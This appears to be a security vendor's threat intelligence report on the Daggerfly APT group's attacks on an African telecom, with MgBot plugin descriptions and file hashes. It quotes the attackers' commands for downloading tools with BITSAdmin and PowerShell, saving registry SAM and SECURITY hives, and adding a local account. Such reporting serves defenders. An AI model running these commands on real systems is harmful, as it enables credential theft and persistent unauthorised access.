Posted: 8 Min ReadThreat Intelligence
Translation: 日本語

Daggerfly: APT Actor Targets Telecoms Company in Africa

New MgBot malware framework plugins deployed in recent campaign.

A telecommunications organization in Africa appears to be among the latest targets for the Daggerfly (aka Evasive Panda, Bronze Highland) advanced persistent threat (APT) group, with the group’s most recent campaign using previously unseen plugins from the MgBot malware framework.

The first indications of malicious activity on this victim’s network were seen in November 2022, but there are indications the activity is likely still ongoing. Researchers from the Threat Hunter Team at Symantec, by Broadcom Software, found multiple unique plugins associated with the MgBot modular malware framework on the victim’s network. The attackers were also seen using a PlugX loader and abusing the legitimate AnyDesk remote desktop software. Use of the MgBot modular malware framework and PlugX loader have been associated in the past with China-linked APTs.

Association between this activity and Daggerfly is based in part on details in a 2020 blog about activity that Malwarebytes attributed to Evasive Panda. Crossovers in the activity included:

  • One of the MgBot samples found appears in both sets of activity
  • Both sets of activity include a renamed Rundll32.exe file named "dbengin.exe" in the ProgramData\Microsoft\PlayReady directory
  • The loader DLL "pMsrvd.dll" in the csidl_common_appdata\microsoft\playready\mdie942.tmp directory appears in both sets of activity

The folders and file names used in this recent activity, as well as the use of DLL side-loading, also support the attribution. The activity documented by Malwarebytes occurred in 2020, and Daggerfly is believed to have been active since at least 2014.


Attack Chain

Suspicious AnyDesk connections spotted on a Microsoft Exchange mail server in November 2022 were among the first signs of suspicious activity on the victim network targeted in this recent Daggerfly activity. AnyDesk is a legitimate remote desktop software but it is commonly abused by threat actors for remote access and other purposes.

The WannaMine crypto-mining malware was also seen on the same Exchange server, though it appears likely that this activity was not linked to the Daggerfly group. The presence of WannaMine, however, does indicate that the server it was found on may have been unpatched and vulnerable to the EternalBlue exploit, as well as more recent exploits targeting this web server.

The legitimate, free Rising antivirus software was also used to side-load the PlugX loader onto victim machines.

We will go through the attack chain in further detail below.

File downloads

Threat actors used the living-off-the-land tools BITSAdmin and PowerShell to download files onto victim systems. The attackers downloaded the legitimate AnyDesk executable and the GetCredManCreds tool in this way.

Commands used by the attackers to download remote desktop access tools onto victim machines
bitsadmin /transfer d7d3 CSIDL_COMMON_APPDATA\anydesk.exe “CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" Invoke-WebRequest -Uri -OutFile CSIDL_COMMON_APPDATA\anydesk.exe

Credential dumping

The attackers used the previously downloaded GetCredManCreds script to retrieve the usernames and passwords of web services stored in the credential manager using PowerShell.

Commands used by the attackers to download credential dumping tools onto victim machines
"CSIDL_SYSTEM\windowspowershell\v1.0\powershell.exe" Invoke-WebRequest -Uri -OutFile CSIDL_COMMON_APPDATA\a.ps1

They also dumped the SAM (Security Account Manager), System, and Security hives of the Windows registry using the reg.exe tool. This allowed the adversaries to extract credentials from the SAM database.

Commands used by the attackers to steal credentials
"CSIDL_SYSTEM\reg.exe" save hklm\sam "CSIDL_SYSTEM\reg.exe" save hklm\system "CSIDL_SYSTEM\reg.exe" save hklm\security

Persistence with local account

Daggerfly also created a local account to maintain access to victim systems with the following command line:

"CSIDL_SYSTEM\net.exe" user [REDACTED] Pqssword1 /add

MgBot modular malware framework

MgBot is a well-designed modular framework that is actively maintained. The components of the framework are the following:

  • MgBot EXE dropper
  • MgBot DLL Loader
  • MgBot Plugins

The MgBot plugins that were deployed in this activity have numerous capabilities that can provide the attackers with a significant amount of information about compromised machines. Among the unique plugins that were deployed during this activity were:

  • Network scanner – innocence.dll
    • Capabilities include: arp scan, http scan, determining the type of server (e.g. SQL, WebLogic, Redis, etc.) it is running on.
  • A Chrome and Firefox infostealer that can gather information such as bookmarks and browsing history – bkmk.dll
  • Logging module – famdowm.dll
    • Based on the open-source easylogging++, which can carry out basic logging, track performance and more.
  • QQ messages infostealer – qmsdp.dll
    • Based on this blog, which details how a chat tool message database was cracked by hackers.
  • Active Directory enumeration – ceeeb.dll
    • Collects the following information from Active directory:
      • Members info
      • Computers 
      • Local Admins
      • Remote Desktop Users
      • Dcom Users
  • Password dumper – cpfwplgx.dll
    • Drops a file to call the MiniDumpWriteDump API to dump a process memory.
  • QQ Keylogger – kstrcs.dll
    • Keylogger that targets QQEdit.exe and QQ.exe processes.
  • Screen and clipboard grabber – cbmrpa.dll
    • Captures clipboard and drag and drop data and saves it to a file.
  • Outlook and Foxmail credentials stealer – maillfpassword.dll
  • Audio capture – prsm.dll
    • Captures audio from the infected system.
    • Uses COM objects IMMDeviceEnumerator, IAudioCaptureClient.
  • Process Watchdog – ansecprocesskeep.dll
    • Registered as service AnsecProcessKeep.
    • Confirmed to be a watchdog that keeps a process running.
    • The process name is found in an .ini file.

All of these capabilities would have allowed the attackers to collect a significant amount of information from victim machines. The capabilities of these plugins also show that the main goal of the attackers during this campaign was information-gathering.

Daggerfly’s development of these previously unseen plugins demonstrates that the attack group is continuing to actively develop its malware and the tools it can use to target victim networks.  


Continuation of a Trend

Telecoms companies will always be a key target in intelligence gathering campaigns due to the access they can potentially provide to the communications of end-users.

Symantec’s Threat Hunter team also spotted some other recent activity targeting telecoms companies that was linked with moderate confidence to the threat actor Othorene (aka Gallium), in what appeared to be a continuation of an intelligence-gathering campaign first reported on by SentinelOne under the name Operation Tainted Love in March. SentinelOne reported that in that campaign Othorene was targeting telecoms companies in the Middle East.

Othorene has been active since around 2014, and it is believed to be a relatively small group that has a strong focus on the surveillance of individuals. There are some indications that Othorene may have links with the APT41 (aka Blackfly, Grayfly) APT group also. Overlap of both personnel and tactics, techniques, and procedures (TTPs) among Chinese APT groups is not uncommon, and can mean that attributing activity to one group with high confidence is difficult.

In the activity Symantec saw, we found three additional victims of the same campaign that SentinelOne detailed, located in Asia and Africa. Two of the three were subsidiaries of the same Middle Eastern telecoms firm. The attackers had been active on victim networks since November 2022. Symantec saw attackers dumping credentials and scanning the network using NbtScan.

The main malware (pc.exe dubbed mim221) in this campaign was used to dump credentials, and it had the same password as the malware used in the activity documented by SentinelOne. The attackers also moved laterally across victims’ networks, used Scheduled Task for persistence, and dumped SAM and System hives from the registry. There were indications that the attackers may have exported the Active Directory database on victim machines, and they were also able to gain access to domain controllers, giving them deep access to victim networks.



For the latest protection updates, please visit the Symantec Protection Bulletin.


Indicators of Compromise

If an IOC is malicious and the file available to us, Symantec Endpoint products will detect and block that file.


File Indicators – Daggerfly

MgBot Dropper




MgBot – aasrvd.dll, pmsrvd.dll




MgBot Plugins






29df6c3f7d13b259b3bc5d56f2cdd14782021fc5f9597a3ccece51ffac2010a0 ea2be3d0217a2efeb06c93e32f489a457bdea154fb4a900f26bef83e2053f4fd








PlugX Loader – proccom.dll, djcu.dll





DumpCredStore – dumpcredstore.ps1, a.ps1




AnyDesk – anydesk.exe



File Indicators – Othorene

3f75818e2e43a744980254bfdc1225e7743689b378081c560e824a36e0e0a195 – pc.exe, rpc.exe (Main malware)

1b8500e27edc87464b8e5786dc8c2beed9a8c6e58b82e50280cebb7f233bcde4 – get.exe (used to print Syskey and Samkey)

03bc62bd9a681bdcb85db33a08b6f2b41f853de84aa237ae7216432a6f8f817e – pc.dll

ae39ced76c78e7c2043b813718e3cd610e1a8adac1f9ad5e69cf06bd6e38a5bd – pc.dll

f6f6152db941a03e1f45d52ab55a2e3d774015ccb8828533654e3f3161cfcd21 – pc.exe

2f4a97dc70f06e0235796fec6393579999c224e144adcff908e0c681c123a8a2 – pc.dll

22069984cba22be84fe33a886d989b683de6eb09f001670dbd8c1b605460d454 – pc.dll

7b945fb1bdeb27a35fab7c2e0f5f45e0e64df7821dd1417a77922c9b08acfdc3 – rpc.dll

e8be3e40f79981a1c29c15992da116ea969ab5a15dc514479871a50b20b10158 – pc.dl

b5c46c2604e29e24c6eb373a7287d919da5c18c04572021f20b8e1966b86d585 – rpc.dll

53d2506723f4d69afca33e90142833b132ed11dd0766192a087cb206840f3692 – test.exe

26d129aaa4f0f830a7a20fe6317ee4a254b9caac52730b6fed6c482be4a5c79d – g.dll

b45355c8b84b57ae015ad0aebfa8707be3f33e12731f7f8c282c8ee51f962292 – g.dll

17dce65529069529bcb5ced04721d641bf6d7a7ac61d43aaf1bca2f6e08ead56 – getHashFlsa64.dll

98b6992749819d0a34a196768c6c0d43b100ef754194308eae6aaa90352e2c13 – getHashFlsa64.dll

6d5be3e6939a7c86280044eebe71c566b48981a3341193aa3aff634a3a5d1bbd – getHashFlsa64.dll

1cf04c3e8349171d907b911bc2a23bdb544d88e2f9b8fcc516d8bcf68168aede – getHashFlsa64.dll

About the Author

Threat Hunter Team


The Threat Hunter Team is a group of security experts within Symantec whose mission is to investigate targeted attacks, drive enhanced protection in Symantec products, and offer analysis that helps customers respond to attacks.

Want to comment on this post?

We encourage you to share your thoughts on your favorite social platform.